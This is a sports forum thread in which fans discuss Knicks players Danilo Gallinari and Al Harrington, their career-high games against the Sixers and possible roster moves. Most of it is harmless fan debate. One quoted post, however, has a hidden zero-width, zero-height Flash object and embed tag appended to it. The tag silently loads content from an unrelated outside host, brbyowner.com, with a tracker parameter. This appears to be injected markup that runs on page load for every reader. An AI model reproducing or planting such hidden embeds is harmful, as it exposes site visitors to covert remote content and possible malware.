Thread: Danilo and Al Harrington Career Highs vs Sixers mix

Default Danilo and Al Harrington Career Highs vs Sixers mix

Al Harrington's Highlights
    [Only registered and activated users can see links. ] ... s#JOSC_TOP

Gallo's Highlights
    [Only registered and activated users can see links. ] ... e#JOSC_TOP

Danilo is turning into an offensive force right in front of our eyes. Wait until he starts driving and getting more shot attempts a game

Big C, what beat is that from the Gallinari mix?

sick mixes bro, and im positive this is just a taste of things to come for gallo, but thered be a ****tttload of depressed knick fans (especially me lol) if he doesnt reach his potential or busts

Originally Posted by Paul1355
    Big C, what beat is that from the Gallinari mix?
    Jay-Z - P.S.A. (from the Black Album... c'mon now...)

I've been a fan of Danilo since years now so when I read he'd dropped 30 points I was like "wow" (I read it because I am in Italy and couldn't watch the game).
    Then, I read the boxscore and I saw that basically all 30 points came from treys.

This is what puzzles me.
    I don't like D'Antoni using him as a pure shooter, because Gallo is much more than that.
    When I manage to see the Knicks games, I always see him run at a corner and wait for a pass. This is terrible, there should be plays drawn for him.

Maybe this offseason we should sign Harrington instead of Lee. Harrington is the better PF for D'Antoni's system and Lee should not be playing Center. Lee's defense is a joke and I'm tired of watching him shoot bricks from 10ft.

I love Lee's hustle but I don't see him fitting with this team in the future. Besides, he would be a bench player on a good team. Harrington could be a decent 3rd option.

Gallo is lighting it up. More plays should be drawn up for him. As Stavrogin said. He has much more to his game besides the 3 pt shot.

Gallo at SF and Harrington at PF is not a bad foundation. All we would need is a shot-blocking/rebounding Center that can run. Sean Williams anyone? He will be available this offseason.

Sign Joe Johnson and trade Curry's expiring contract plus fillers (Chandler?) for a good PG (Hinrich?).

PG-Hinrich
    SG-Johnson
    SF-Gallo
    PF-Harrington
    C-Williams

Not bad. Could be very competitive in the east with D'Antoni's system.

Originally Posted by Big C
    Al Harrington's Highlights
    [Only registered and activated users can see links. ] ... s#JOSC_TOP

Gallo's Highlights
    [Only registered and activated users can see links. ] ... e#JOSC_TOP

Danilo is turning into an offensive force right in front of our eyes. Wait until he starts driving and getting more shot attempts a game<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>
    Nice work man, thanks!

Originally Posted by LJ4ptplay
    Maybe this offseason we should sign Harrington instead of Lee. Harrington is the better PF for D'Antoni's system and Lee should not be playing Center. Lee's defense is a joke and I'm tired of watching him shoot bricks from 10ft.

I love Lee's hustle but I don't see him fitting with this team in the future. Besides, he would be a bench player on a good team. Harrington could be a decent 3rd option.

Gallo is lighting it up. More plays should be drawn up for him. As Stavrogin said. He has much more to his game besides the 3 pt shot.

Gallo at SF and Harrington at PF is not a bad foundation. All we would need is a shot-blocking/rebounding Center that can run. Sean Williams anyone? He will be available this offseason.

Sign Joe Johnson and trade Curry's expiring contract plus fillers (Chandler?) for a good PG (Hinrich?).

PG-Hinrich
    SG-Johnson
    SF-Gallo
    PF-Harrington
    C-Williams

Not bad. Could be very competitive in the east with D'Antoni's system.
    Hinrich is a really underrated player...He shoots efficiently and doesn't make a whole lot of mistakes...

We need more at that position then a guy that "doesn't make a lot of mistakes". Someone who will take charge and direct the offense.

Also, nice Mixes Big C. I think Al and Gallo are a great foundation to the team. Gallo will be a star.

Originally Posted by p0nder
    We need more at that position then a guy that "doesn't make a lot of mistakes". Someone who will take charge and direct the offense.

Also, nice Mixes Big C. I think Al and Gallo are a great foundation to the team. Gallo will be a star.
    And Kirk is more then just a guy who doesn't make a lot of mistakes. I just said that because its true, it is something his play shows. That doesn't limit him to only the positive things I listed.

Originally Posted by TunerAddict
    And Kirk is more then just a guy who doesn't make a lot of mistakes. I just said that because its true, it is something his play shows. That doesn't limit him to only the positive things I listed.
    Agreed. He would run D'Antoni's system nicely. Plus he's a very good defender.

I think we are all in agreement that we need defense more then anything. I think the offense should run through the guard positions and that we need more tenacious defenders out of our 4 and 5 spots. It would be a nice change to see the knicks with a big man again.